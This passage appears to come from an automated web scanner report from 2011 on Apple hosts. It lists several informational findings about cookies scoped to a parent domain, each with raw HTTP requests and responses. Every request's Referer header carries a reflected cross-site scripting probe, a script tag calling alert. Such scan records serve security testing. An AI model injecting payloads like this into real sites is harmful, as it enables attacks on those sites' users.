s_vnum_us=ch%3Dsupport%26vn%3D8%3Bch%3Dsafari%26vn%3D2%3Bch%3Ddeveloper%26vn%3D4%3Bch%3Dbuy%26vn%3D2%3Bch%3Dsearch%26vn%3D1%3Bch%3Dhomepage%26vn%3D2%3Bch%3Dicloud%26vn%3D2%3Bch%3Dcontact%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dmyappleid.iforgot%26vn%3D4%3Bch%3Dmac%26vn%3D1%3Bch%3Dmacosx%26vn%3D2%3Bch%3Djobs%26vn%3D1%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dtrailers%26vn%3D1%3Bch%3Dipod%26vn%3D1%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmyappleid%26vn%3D2%3Bch%3Dali%26vn%3D2%3Bch%3Daccess%20management%26vn%3D1%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dmacosx.downloads%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss%7C%7C%7C%7Cxssxss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; s_membership=1%3Aaid; dslang=US-EN
If-Modified-Since: Mon, 16 May 2011 23:19:02 GMT
If-None-Match: "52da-4a36ce1818580"

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Mon, 16 May 2011 23:19:02 GMT
ETag: "52da-4a36ce1818580"
Cache-Control: max-age=364
Expires: Tue, 19 Jul 2011 18:56:44 GMT
Date: Tue, 19 Jul 2011 18:50:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=m9/CPkw5LYIvCVzI84KswFfsTPWQTIJawwQIZs9o2PB0TBT1ovgy3ln6NmgFVXWxe28ZkpzYNgIOieP+3eWkJAxVytLayQ1tfgMcX6DRdUmAnmimWKGqd1xzwenJEayZwv7uxmhSF3CLrp93uSRC4YAAo8gcHB6esH9FOaxBi4Flva6z29KPIxWB7aWVfwK2AKRb4ZCDECK/uY3+TvkeJeYH5GbI/qWQEudByrxnPrDLhuhhyWCvk+8ARqzhXx5rlLcRqDZbVkEN6MgXCE6VIleRIOzVcf8J9TlQ/WwKlsu3VInW+sFCFQcJve8SUEbn+2GSz2o4ZnWqP0VnTvJAfyRsLxqbEMtCt29XklyX2RYPUMNix5b/oCM/cW4vKZfJT1Y9vGXe0Fjvva6FucMUCdROvPiCeFfQKEQv6GlbBv6I58Od4d6gv9Qh9/PMPhmzbNRdfR+EREc/ZOaKdVdHWAQB6kgbzc+xtEev6d2e5xvlYpQO/MuQLYnWwIRc3zu7hyz4n2T+tx27XrIVxumLBYm7MT7koJZi7SrwP50EfcHb+NaXkzPal8ObUbigg59I; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

13.64. http://images.apple.com/global/scripts/browserdetect.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/browserdetect.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=W9d+P/weFqXFr6H8nSQrFNjrX108Oe5VqptvfEBzDpvj68l+vIceQs0teSQaTJ2djpwcgjtR7a+Mxj5YgWVADoEk5u0RQjgnZEVBo3iTA57e3UARWFfTplsk3U6C5f7uX6Mo4Nr1OLUNearzGAZ2qAVp1s55m45QcPHq6T7rhJ6m8lzGcTv9INR0f72zHNlk/M0vXA4TsCidLkg639JfMpJgNuNE1Z5UQj/JRfdFAVHq51xfp0n8+cAXYl7s+e4hNqrCWONWevzft2zI65Hcnnc4FcKlwNe+u5BCmi9Mj3anmM2oAHjs2GJPNPwhULU5DsUKSa6duqb+SxJ1ryW1aOPfPe+Po2zxh0fHYIMN3DPkf8uAtycmQGsMpDKG1MEf0h+bg3hhvqDeHqnMdlKdd2mnZM/fBUoAkdMK3MJkx4BysVjUzu5dFAyx3QsB+0GgSKBUc/IGUlBIyEW4OBiK6gPf85aoUMR9CLeU47799FK23u4kbVxYSYQIlMtN4LqZRfteAXVJLMdyEM5uT6fEByeDHgwtljUe44mrZNHWePZM4qeLDoVKQXnQI89j2bpl; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/browserdetect.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3Ec29f000149b
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310698467867'%5D%2C%5B'OAS-US-DOMAINS-mac.com'%2C'1310703720371'%5D%2C%5B'oas-us-domains-mac.com'%2C'1310703744694'%5D%2C%5B'www.fakereferrerdominator.com'%2C'1310911506300'%5D%2C%5B'OAS-US-DOMAINS-guide.apple.com'%2C'1310911669487'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D8%3Bch%3Dsafari%26vn%3D2%3Bch%3Ddeveloper%26vn%3D4%3Bch%3Dbuy%26vn%3D2%3Bch%3Dsearch%26vn%3D1%3Bch%3Dhomepage%26vn%3D2%3Bch%3Dicloud%26vn%3D2%3Bch%3Dcontact%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dmyappleid.iforgot%26vn%3D4%3Bch%3Dmac%26vn%3D1%3Bch%3Dmacosx%26vn%3D2%3Bch%3Djobs%26vn%3D1%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dtrailers%26vn%3D1%3Bch%3Dipod%26vn%3D1%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmyappleid%26vn%3D2%3Bch%3Dali%26vn%3D2%3Bch%3Daccess%20management%26vn%3D1%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dmacosx.downloads%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss%7C%7C%7C%7Cxssxss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; s_membership=1%3Aaid; dslang=US-EN
If-Modified-Since: Sat, 04 Jun 2011 18:36:31 GMT
If-None-Match: "25fd-4a4e72621e9c0"

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Sat, 04 Jun 2011 18:36:31 GMT
ETag: "25fd-4a4e72621e9c0"
Cache-Control: max-age=524
Expires: Tue, 19 Jul 2011 18:59:24 GMT
Date: Tue, 19 Jul 2011 18:50:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=W9d+P/weFqXFr6H8nSQrFNjrX108Oe5VqptvfEBzDpvj68l+vIceQs0teSQaTJ2djpwcgjtR7a+Mxj5YgWVADoEk5u0RQjgnZEVBo3iTA57e3UARWFfTplsk3U6C5f7uX6Mo4Nr1OLUNearzGAZ2qAVp1s55m45QcPHq6T7rhJ6m8lzGcTv9INR0f72zHNlk/M0vXA4TsCidLkg639JfMpJgNuNE1Z5UQj/JRfdFAVHq51xfp0n8+cAXYl7s+e4hNqrCWONWevzft2zI65Hcnnc4FcKlwNe+u5BCmi9Mj3anmM2oAHjs2GJPNPwhULU5DsUKSa6duqb+SxJ1ryW1aOPfPe+Po2zxh0fHYIMN3DPkf8uAtycmQGsMpDKG1MEf0h+bg3hhvqDeHqnMdlKdd2mnZM/fBUoAkdMK3MJkx4BysVjUzu5dFAyx3QsB+0GgSKBUc/IGUlBIyEW4OBiK6gPf85aoUMR9CLeU47799FK23u4kbVxYSYQIlMtN4LqZRfteAXVJLMdyEM5uT6fEByeDHgwtljUe44mrZNHWePZM4qeLDoVKQXnQI89j2bpl; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

13.65. http://images.apple.com/global/scripts/content_swap.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/content_swap.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=yset3HlqlXXedErdrhfwFqlK7fPqM3ABNKuAZC58cwdxh7SdMXx+EqpxTqphBovEWPqGrq17zqIGw0tCohwrnSxToTuKbnQnGgu3T9eIk+BT7aZVOK79Rpk7FQFNJ0OgNxj5/KTmw/1CDlXKxb88sPBWbL4TfCoMwRDqTEo273pvf+WKVsLRU9JkU0K9BDODHX+dvYrIR8iTFrcccwdGqkJV3euxF1RsybNzNGSiYrfcYKlfu8h2lY8LYmGHY2b20GywOs70THudYHDvIf6JziCzOJTf/F1be8SGBq14vEBmUGGd9t62bmSQUHh++p+1Phub0kwrIUTCr7+7szmbQVYAVMI0u0LFe3rtUmSKwoW2M1zS/2zk6/pzwCUd7+yBmf+0f88i26KxzaHE1c4uxN5cQf/s1/PFJU/Zii3Qp9OjxltvMY3MngUN4ZXYCdrqWeV7+msCzSToLtJPlDDoDgkaPUj4vNfMd3s3Td67C9yEXKxbLkDTalMdHl5EWpw0uW0OZOs3T2djrXkhCZ8xwwGUy8+tHLRzOFWbcgrq1UHNsiHE36xYCxJv/epLnHSY; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/content_swap.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3Ec29f000149b
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310698467867'%5D%2C%5B'OAS-US-DOMAINS-mac.com'%2C'1310703720371'%5D%2C%5B'oas-us-domains-mac.com'%2C'1310703744694'%5D%2C%5B'www.fakereferrerdominator.com'%2C'1310911506300'%5D%2C%5B'OAS-US-DOMAINS-guide.apple.com'%2C'1310911669487'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D8%3Bch%3Dsafari%26vn%3D2%3Bch%3Ddeveloper%26vn%3D4%3Bch%3Dbuy%26vn%3D2%3Bch%3Dsearch%26vn%3D1%3Bch%3Dhomepage%26vn%3D2%3Bch%3Dicloud%26vn%3D2%3Bch%3Dcontact%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dmyappleid.iforgot%26vn%3D4%3Bch%3Dmac%26vn%3D1%3Bch%3Dmacosx%26vn%3D2%3Bch%3Djobs%26vn%3D1%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dtrailers%26vn%3D1%3Bch%3Dipod%26vn%3D1%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmyappleid%26vn%3D2%3Bch%3Dali%26vn%3D2%3Bch%3Daccess%20management%26vn%3D1%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dmacosx.downloads%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss%7C%7C%7C%7Cxssxss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; s_membership=1%3Aaid; dslang=US-EN
If-Modified-Since: Tue, 18 Nov 2008 01:42:58 GMT
If-None-Match: "864-45becd0a92c80"

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Tue, 18 Nov 2008 01:42:58 GMT
ETag: "864-45becd0a92c80"
Cache-Control: max-age=447
Expires: Tue, 19 Jul 2011 18:58:07 GMT
Date: Tue, 19 Jul 2011 18:50:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=yset3HlqlXXedErdrhfwFqlK7fPqM3ABNKuAZC58cwdxh7SdMXx+EqpxTqphBovEWPqGrq17zqIGw0tCohwrnSxToTuKbnQnGgu3T9eIk+BT7aZVOK79Rpk7FQFNJ0OgNxj5/KTmw/1CDlXKxb88sPBWbL4TfCoMwRDqTEo273pvf+WKVsLRU9JkU0K9BDODHX+dvYrIR8iTFrcccwdGqkJV3euxF1RsybNzNGSiYrfcYKlfu8h2lY8LYmGHY2b20GywOs70THudYHDvIf6JziCzOJTf/F1be8SGBq14vEBmUGGd9t62bmSQUHh++p+1Phub0kwrIUTCr7+7szmbQVYAVMI0u0LFe3rtUmSKwoW2M1zS/2zk6/pzwCUd7+yBmf+0f88i26KxzaHE1c4uxN5cQf/s1/PFJU/Zii3Qp9OjxltvMY3MngUN4ZXYCdrqWeV7+msCzSToLtJPlDDoDgkaPUj4vNfMd3s3Td67C9yEXKxbLkDTalMdHl5EWpw0uW0OZOs3T2djrXkhCZ8xwwGUy8+tHLRzOFWbcgrq1UHNsiHE36xYCxJv/epLnHSY; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

13.66. http://images.apple.com/global/scripts/lib/event_mixins.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/lib/event_mixins.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=sBVN3TbalgB5E4m7E2xJmh0tmzDg2x54HfrzCe1cTPY/JCCdkEWUzjsmaMQ+M+20mvHYnyoNpkw/0GE+0PvYuDoDWuxsH+O1SX7ECNzZCPm+y3dS3i/+9OXsY1OnxfDzuDZK8QHdTyJFaUXXMMF6x5TlnphpmdnubPhpBm5ifixOdVBey0Iu322OO4vxLb4/mkNtVxBpebhlf1AFNnfUVoQGmzco212M5bUx68c5kVY/rO4FXA8Sw14poHM86i3S+0T8rkrHw68Nbi/R9JRHGuNDvreVVKff3A7A3CFjHzY9nTGS19mlXN0xoWF4grvxy+fG84px5BkF5ZsGz4ZGDc/6Ozi7MiWdA6dLP4DNSVxtKK1aV4tk5v/eHC1ThR4yBjGjQVwhBbsxdhErZ960BpYWHkPzQoLSnGp4/blKB5yhJAfvpDqw15ZTt7E4YUS0cA1nqyyl+NXX17fxrkuYu6tl01HkGv4cY0LoiO+iMYbjZVt7ZuOzSFuStNQSR67hb/fOAgJ5XkzMcyCaQi3Dq+ECqimj/QsOc4882PVjSLDy777hpnD72Tft8IAxZBU9; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/lib/event_mixins.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3Ec29f000149b
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310698467867'%5D%2C%5B'OAS-US-DOMAINS-mac.com'%2C'1310703720371'%5D%2C%5B'oas-us-domains-mac.com'%2C'1310703744694'%5D%2C%5B'www.fakereferrerdominator.com'%2C'1310911506300'%5D%2C%5B'OAS-US-DOMAINS-guide.apple.com'%2C'1310911669487'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D8%3Bch%3Dsafari%26vn%3D2%3Bch%3Ddeveloper%26vn%3D4%3Bch%3Dbuy%26vn%3D2%3Bch%3Dsearch%26vn%3D1%3Bch%3Dhomepage%26vn%3D2%3Bch%3Dicloud%26vn%3D2%3Bch%3Dcontact%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dmyappleid.iforgot%26vn%3D4%3Bch%3Dmac%26vn%3D1%3Bch%3Dmacosx%26vn%3D2%3Bch%3Djobs%26vn%3D1%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dtrailers%26vn%3D1%3Bch%3Dipod%26vn%3D1%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmyappleid%26vn%3D2%3Bch%3Dali%26vn%3D2%3Bch%3Daccess%20management%26vn%3D1%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dmacosx.downloads%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss%7C%7C%7C%7Cxssxss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; s_membership=1%3Aaid; dslang=US-EN
If-Modified-Since: Fri, 11 Jul 2008 11:54:18 GMT
If-None-Match: "1fc2-451be3396ce80"

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Fri, 11 Jul 2008 11:54:18 GMT
ETag: "1fc2-451be3396ce80"
Cache-Control: max-age=345
Expires: Tue, 19 Jul 2011 18:56:25 GMT
Date: Tue, 19 Jul 2011 18:50:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=sBVN3TbalgB5E4m7E2xJmh0tmzDg2x54HfrzCe1cTPY/JCCdkEWUzjsmaMQ+M+20mvHYnyoNpkw/0GE+0PvYuDoDWuxsH+O1SX7ECNzZCPm+y3dS3i/+9OXsY1OnxfDzuDZK8QHdTyJFaUXXMMF6x5TlnphpmdnubPhpBm5ifixOdVBey0Iu322OO4vxLb4/mkNtVxBpebhlf1AFNnfUVoQGmzco212M5bUx68c5kVY/rO4FXA8Sw14poHM86i3S+0T8rkrHw68Nbi/R9JRHGuNDvreVVKff3A7A3CFjHzY9nTGS19mlXN0xoWF4grvxy+fG84px5BkF5ZsGz4ZGDc/6Ozi7MiWdA6dLP4DNSVxtKK1aV4tk5v/eHC1ThR4yBjGjQVwhBbsxdhErZ960BpYWHkPzQoLSnGp4/blKB5yhJAfvpDqw15ZTt7E4YUS0cA1nqyyl+NXX17fxrkuYu6tl01HkGv4cY0LoiO+iMYbjZVt7ZuOzSFuStNQSR67hb/fOAgJ5XkzMcyCaQi3Dq+ECqimj/QsOc4882PVjSLDy777hpnD72Tft8IAxZBU9; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

13.67. http://images.apple.com/global/scripts/lib/prototype.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/lib/prototype.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=hMyCmLF+YsroMeGIo0mEk3STgu7UYkNoKxupEtmb3LVs/Fn3urFJcVbv7h5V+5y0Go9jUjbAhCUQ9eExHixVAfNzygpZjF1oc3AG0bubbEVlPzjVH6Adnne50hBhYnVY9bZbpB+/BN5tt+aN7AazSN0+OMySApYdn0gDrEmFqaXR7CFdWG/FgcDPEEfAcovhD7EYb6D+nYw/aW1VIKmc53GWjLK9LHxCIQbpHoIHnqY4JJoKVL8itd8BSK42z4SOwOTXZhOcNVrntM/inbSztqwO0DVmWnKDMM/P4GrjUwbdmfh3d/7434snspLKsSy3FAHLQ3NH4kYba/1JwYTThA07i6rPYxcaOuoAQN7kfMei6SBfLUHAtIbkoMNi696fSbk/GqR7U3i6gC+iOamYT/NaUQFqPSKEtx4XAXdjAh8VvFS+dZ59yR/yoyMgrds8layxUG/JSESb1MvvrdU8UIEkn4FNus6vUMHl1vzz8f8SOTEo2OMAabczdG6gKhOiVOqFgVoGAqNLsFQdbzB4zy0FSnREg2NSPZkV0Mb6Z+vBtS+2Gzqbtw44WG/1OnJc; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/lib/prototype.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3Ec29f000149b
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310698467867'%5D%2C%5B'OAS-US-DOMAINS-mac.com'%2C'1310703720371'%5D%2C%5B'oas-us-domains-mac.com'%2C'1310703744694'%5D%2C%5B'www.fakereferrerdominator.com'%2C'1310911506300'%5D%2C%5B'OAS-US-DOMAINS-guide.apple.com'%2C'1310911669487'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D8%3Bch%3Dsafari%26vn%3D2%3Bch%3Ddeveloper%26vn%3D4%3Bch%3Dbuy%26vn%3D2%3Bch%3Dsearch%26vn%3D1%3Bch%3Dhomepage%26vn%3D2%3Bch%3Dicloud%26vn%3D2%3Bch%3Dcontact%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dmyappleid.iforgot%26vn%3D4%3Bch%3Dmac%26vn%3D1%3Bch%3Dmacosx%26vn%3D2%3Bch%3Djobs%26vn%3D1%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dtrailers%26vn%3D1%3Bch%3Dipod%26vn%3D1%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmyappleid%26vn%3D2%3Bch%3Dali%26vn%3D2%3Bch%3Daccess%20management%26vn%3D1%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dmacosx.downloads%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss%7C%7C%7C%7Cxssxss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; s_membership=1%3Aaid; dslang=US-EN
If-Modified-Since: Thu, 31 Mar 2011 00:21:09 GMT
If-None-Match: "27df1-49fbc451c6740"

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Thu, 31 Mar 2011 00:21:09 GMT
ETag: "27df1-49fbc451c6740"
Cache-Control: max-age=462
Expires: Tue, 19 Jul 2011 18:58:22 GMT
Date: Tue, 19 Jul 2011 18:50:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=hMyCmLF+YsroMeGIo0mEk3STgu7UYkNoKxupEtmb3LVs/Fn3urFJcVbv7h5V+5y0Go9jUjbAhCUQ9eExHixVAfNzygpZjF1oc3AG0bubbEVlPzjVH6Adnne50hBhYnVY9bZbpB+/BN5tt+aN7AazSN0+OMySApYdn0gDrEmFqaXR7CFdWG/FgcDPEEfAcovhD7EYb6D+nYw/aW1VIKmc53GWjLK9LHxCIQbpHoIHnqY4JJoKVL8itd8BSK42z4SOwOTXZhOcNVrntM/inbSztqwO0DVmWnKDMM/P4GrjUwbdmfh3d/7434snspLKsSy3FAHLQ3NH4kYba/1JwYTThA07i6rPYxcaOuoAQN7kfMei6SBfLUHAtIbkoMNi696fSbk/GqR7U3i6gC+iOamYT/NaUQFqPSKEtx4XAXdjAh8VvFS+dZ59yR/yoyMgrds8layxUG/JSESb1MvvrdU8UIEkn4FNus6vUMHl1vzz8f8SOTEo2OMAabczdG6gKhOiVOqFgVoGAqNLsFQdbzB4zy0FSnREg2NSPZkV0Mb6Z+vBtS+2Gzqbtw44WG/1OnJc; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

13.68. http://images.apple.com/global/scripts/lib/scriptaculous.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/lib/scriptaculous.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=b0z9opXdW37drfDfyMKib4xNpnFpP9m+gj5KUJnAOz3PjFPvhXjCszkAFvAFuV/gcgrqMXyNcPXYm95N2qr1UA5Beq2Qg2/fBWvUJxn/PLs4urDm8oDEz0V9Vjw9u9T0sAWm5dM9Ife+3gnHwmLNx6rmZhDdUjitHJzOfKSsbkWqjY5QiiryzykhI0Cp5hiplk03WNr93Gvm00fJ68CJQgx3oxnz+Tcvt8xxRGc4hPpQRIwvoS9YCmRCFkjFLu+iZCdBfosP+ezysYfkB0WF0SoYwu6lT6T47vNuyZJQQGZvjgTYbia5ACFHDi1emMISu8eEO9JKoafuPu+/EP1ozm5XmArYvYTWZLXVQEWyDrgGITPxRTOsRYja56nXmRVzIUtsVwx+nTB7DT0pKu5F2jmIGM5geNmpd+w1mH9vKeSqK/3clVku0EA2pTtjPkoTSs4aSWVNQZrG4sOb6yqgaxl4+cpYNXhZSxOr34gBYV2XHdvBlA0dpS5XLgy6HbDpNp/Ny5K9K3isKGHjCuQvDEyPsCXOrWLHmtJn79hNa1i5wEkPBAYbYOLjQmrlA+ga; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/lib/scriptaculous.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3Ec29f000149b
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310698467867'%5D%2C%5B'OAS-US-DOMAINS-mac.com'%2C'1310703720371'%5D%2C%5B'oas-us-domains-mac.com'%2C'1310703744694'%5D%2C%5B'www.fakereferrerdominator.com'%2C'1310911506300'%5D%2C%5B'OAS-US-DOMAINS-guide.apple.com'%2C'1310911669487'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D8%3Bch%3Dsafari%26vn%3D2%3Bch%3Ddeveloper%26vn%3D4%3Bch%3Dbuy%26vn%3D2%3Bch%3Dsearch%26vn%3D1%3Bch%3Dhomepage%26vn%3D2%3Bch%3Dicloud%26vn%3D2%3Bch%3Dcontact%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dmyappleid.iforgot%26vn%3D4%3Bch%3Dmac%26vn%3D1%3Bch%3Dmacosx%26vn%3D2%3Bch%3Djobs%26vn%3D1%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dtrailers%26vn%3D1%3Bch%3Dipod%26vn%3D1%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmyappleid%26vn%3D2%3Bch%3Dali%26vn%3D2%3Bch%3Daccess%20management%26vn%3D1%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dmacosx.downloads%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss%7C%7C%7C%7Cxssxss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; s_membership=1%3Aaid; dslang=US-EN
If-Modified-Since: Tue, 13 May 2008 05:05:45 GMT
If-None-Match: "1cf46-44d159ddcfc40"

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Tue, 13 May 2008 05:05:45 GMT
ETag: "1cf46-44d159ddcfc40"
Cache-Control: max-age=403
Expires: Tue, 19 Jul 2011 18:57:23 GMT
Date: Tue, 19 Jul 2011 18:50:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=b0z9opXdW37drfDfyMKib4xNpnFpP9m+gj5KUJnAOz3PjFPvhXjCszkAFvAFuV/gcgrqMXyNcPXYm95N2qr1UA5Beq2Qg2/fBWvUJxn/PLs4urDm8oDEz0V9Vjw9u9T0sAWm5dM9Ife+3gnHwmLNx6rmZhDdUjitHJzOfKSsbkWqjY5QiiryzykhI0Cp5hiplk03WNr93Gvm00fJ68CJQgx3oxnz+Tcvt8xxRGc4hPpQRIwvoS9YCmRCFkjFLu+iZCdBfosP+ezysYfkB0WF0SoYwu6lT6T47vNuyZJQQGZvjgTYbia5ACFHDi1emMISu8eEO9JKoafuPu+/EP1ozm5XmArYvYTWZLXVQEWyDrgGITPxRTOsRYja56nXmRVzIUtsVwx+nTB7DT0pKu5F2jmIGM5geNmpd+w1mH9vKeSqK/3clVku0EA2pTtjPkoTSs4aSWVNQZrG4sOb6yqgaxl4+cpYNXhZSxOr34gBYV2XHdvBlA0dpS5XLgy6HbDpNp/Ny5K9K3isKGHjCuQvDEyPsCXOrWLHmtJn79hNa1i5wEkPBAYbYOLjQmrlA+ga; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

13.69. http://images.apple.com/global/scripts/overlay_panel.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/overlay_panel.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

